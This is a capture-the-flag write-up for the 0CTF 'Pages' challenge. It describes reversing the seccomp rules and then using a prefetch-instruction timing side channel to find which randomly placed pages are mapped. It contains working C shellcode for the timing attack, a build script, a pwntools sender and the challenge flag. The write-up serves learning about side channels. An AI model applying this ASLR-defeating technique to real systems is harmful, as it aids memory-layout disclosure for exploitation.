0Ctf - Pages Writeup

First of all this has been a really enjoyable challenge kudos to the creator. The provided binary is pretty simple, it reads 64 random bits from /dev/urandom then forks and in the child process maps 64 + 2 regions. The offset of the first 64 mmaped pages depends on random bits and it is calculated in the following way:

addr = base + 0x2000 * i + 0x1000 * random[i]

The 65th mapped page is on a fixed address and functions as a “shared memory” between parent and child process, more on it later. There are also 4 pages mapped on the 0x400000000 address with r-x permissions, this area is going to hold our shell code.

After the pages are mapped the random bits are erased from the memory. Then the program goes on and reads our shell code to the executable page and jumps to it. Sounds perfect but unfortunately, before all of these shenanigans it calls some magical mystical prctl functions that are used to set up some really unwelcomed seccomp rules. Meanwhile the parent process ptraces the child and after the child breaks (calls int 3) it pokes its memory with ptrace. The poked memory is compared to the original random bytes and if they match the flag is printed.

So the goal of the challenge is to figure out the original random bytes based on the position of the 64 mmaped pages and then write the solution to the predefined address.

I began solving this challenge by further investigating the seccomp rules set by the prctl call, to gain a better idea of my shell code’s possible capabilities. The seccomp rules are defined by a so called filter program similar to the berkely packet filter programs. The byte code of this program is passed to the prctl call and then the kernel parses it (see man seccomp 2). These rules can be found in the binary’s bss and they had to be reversed. The most important structures are the following:

struct sock_fprog {
   unsigned short      len;    /* Number of BPF instructions */
   struct sock_filter *filter; /* Pointer to array of
                                  BPF instructions */
};
struct sock_filter {            /* Filter block */
   __u16 code;                 /* Actual filter code */
   __u8  jt;                   /* Jump true */
   __u8  jf;                   /* Jump false */
   __u32 k;                    /* Generic multiuse field */
};

The structure of these programs is fairly simple, each filter entry can be treated as an instruction where the code is the actual opcode, jt and jf defines how many instructions needs to be skipped if the instruction evaluates to true or false (relative jumps) and k is the operand of these instructions. It is basically a really simple VM. Examples to write such programs and the definition of the “opcodes” are in the kernel sources (see bpf_common.h and seccomp.c). As there were only 7 filter rules I decided to reverse them manually, it was a lot easier than it sounds, only took about 10 minutes after finding the sources. The actual rules are:

LD W ABS, 0, 0, 4 - load arch id
JEQ, 1, 0, 0xC000003E - test if x86_64
RET, 0, 0, 0 - ret kill immediately
LD W ABS, 0, 0, 0 - load syscall number
JEQ, 0, 1, 0x3C - test if sys_exit 
RET, 0, 0, 0x7fff0000 -ret ALLOW
RET, 0, 0, 0 - ret kill immediately

Basically it confirmed my worst fear that none of the syscalls are available (besides exit, but screw that).

At this point it is pretty clear what needs to be done, we have to decide if a given page is mapped in the memory without access to any syscalls. The question is how? The main problem is if we touch any unmapped page it generates a SIGSEGV so we lose. My initial idea was to set up a SIGSEGV signal handler or use a library function like mincore but the problem is that of course these all rely on different system calls. So this route was a no go.

This left me with no other option than different side channel attacks that use timing windows to determine if memory is mapped or not. The problem itself is very similar to certain KASLR (Kernel ASLR) attacks where the memory is not accessible so timing channels are used to evaluate where certain pages are located (shout-out to my teammate @tukan who provided me with a bunch of valuable resources on the topic). The first attack I looked into was the recent JS ASLR derandomization attack AnC, but I dismissed it quickly as it requires memory reads.

The next one on the list was DrK a KASLR derandomization attack which does exactly what I needed, it tells about a page if it is mapped or not without accessing it. The only problem is it relies on a specific hardware feature only available in some new intel CPUs called TSX (Transactional Synchronization eXtensions). The tsx-tools git repository provides tools to check if the feature is available by using the cpuid instruction. Note that since all syscalls are disabled it is impossible to send back data, however when the int 3 is called the parent sends back a “Success” or “Failed!” message. On the other hand when the program crashes no messages is sent back. This one bit information was enough to leak the results of the test. Which failed. Unfortunately the CPU that hosted the challenge did not support the TSX feature.

My last resort was the side channel attack with the prefetch instruction, in essence it is a similar attack than the previous (see the paper and blogpost). The prefetch instruction fetches data from the supplied address into the specified cache (for the attack Layer-2 cache is used for maximum timing differences, see prefetcht2) and it does no validity checking at runtime. Great, but what is even better it takes longer to fetch addresses that are not mapped to physical addresses since searching all the page table entries is slower than hitting something earlier of course.

I decided to test the concept locally and wrote a little PoC which did not work, both mapped and unmapped addresses took similar time to load. I was about to give up, when it occurred to me that pages needed to be written before they were actually mapped to physical memory. After that it was clear that a timing channel exists. I quickly turned my local PoC into a proper shell code, it is presented below:

//exploit.c
#include <stdint.h>
#include "inc/rdtsc.h"

int measure_loop(char* addr, int cnt);
#define ITER_CNT 1000
int main()
{
    // get reference mapped
    char* mapped = 0x300000000;
    char* unmapped = 0x500000000;
    *(mapped + 0x400) = 'A';
    char* base = 0x200000800;
    int t_mapped = measure_loop(mapped+0x400, ITER_CNT);
    int t_unmapped = measure_loop(unmapped, ITER_CNT);
    
    int divide = t_mapped + ((t_unmapped - t_mapped)/2);
    int i = 0;
    int t_test;
    while (i < 64){
        t_test = measure_loop(base, ITER_CNT);
        mapped[i] = t_test < divide ? 0 : 1;
        i++;
        base += 0x2000;
    }
    return 0;

}
static inline uint64_t __attribute__((__always_inline__))
measure_prefetch(char* addr){
    uint64_t beg = rdtsc_beg();
	//_mm_prefetch ((void*)0x400000000, _MM_HINT_T2);
    //__asm __volatile("movabs $0x400000000, %rax; prefetcht2 (%rax)");
    __asm __volatile("mov %0, %%rax; 
        prefetcht2 (%%rax); 
        prefetcht2 (%%rax); 
        prefetcht2 (%%rax); 
        prefetcht2 (%%rax)"
            :: "m"(addr): "rax");

	return rdtsc_end()-beg;
}


int measure_loop(char* addr, int cnt)
{
    int min = 0xfffff;
    int i  = cnt;
    int val;
    uint64_t sum = 0;
	while(i--){
        val = measure_prefetch(addr);
        sum += val;
        if (val < min) min = val;

	}
    return min;
}

I briefly explain what it does. It first calculates a reference time for a mapped page (the “shared memory” solution page) and a surely unmapped page and calculates their average which is the reference value. Then it iterates over all the pages in question and decides whether they are mapped or not using the timing window. The measure loop does multiple iterations to eliminate jitter and returns the lowest received time. The actual measurement happens in the measure_prefetch function which uses the rdtsc instruction to read the CPU time stamp register for accurate time indication. The actual source code of the rdtsc.h is stolen from here. There are multiple prefetcht2 calls because the gcc inline asm register clobbering creates an overhead (four mov instructions) that could mess up the results. The output of each decision is written to the “shared memory” which is later checked by the parent.

I used the following bash script to compile the shell code and get the raw binary code:

#!/bin/bash
if [ "$1" != "" ]; then
    gcc -nostdinc -fno-stack-protector -fno-common -O0 -fomit-frame-pointer\
        -static -I./inc -c $1 -o payload.o
    objcopy --only-section=.text --output-target binary payload.o payload.bin
else
    echo "Needs c source as argument"
fi

And this little python script to send the payload to the server:

from pwn import *
if __name__ == "__main__":
    c = remote(PORT, IP)
    payload = asm("ret")
    with open('payload.bin') as f:
        payload = f.read()
    
    #print hexdump(payload)
    #print disasm(payload)
    c.send(p32(len(payload))+payload)

    print c.recv()
    c.interactive()

And to my greatest surprise the shell code worked like a charm, it gave me the flag on the first run. I have really enjoyed working on this challenge as it was quite different than the usual memory corruption pwn tasks.

flag{rand0mPage_randomFl4g}

About

Categories

Tags

Home

0Ctf - Pages Writeup

March 21, 2017

0Ctf - Pages Writeup

0ctf 2018 - Black Hole Theory

Google CTF - Inst Prof Writeup

Google CTF - Wiki Writeup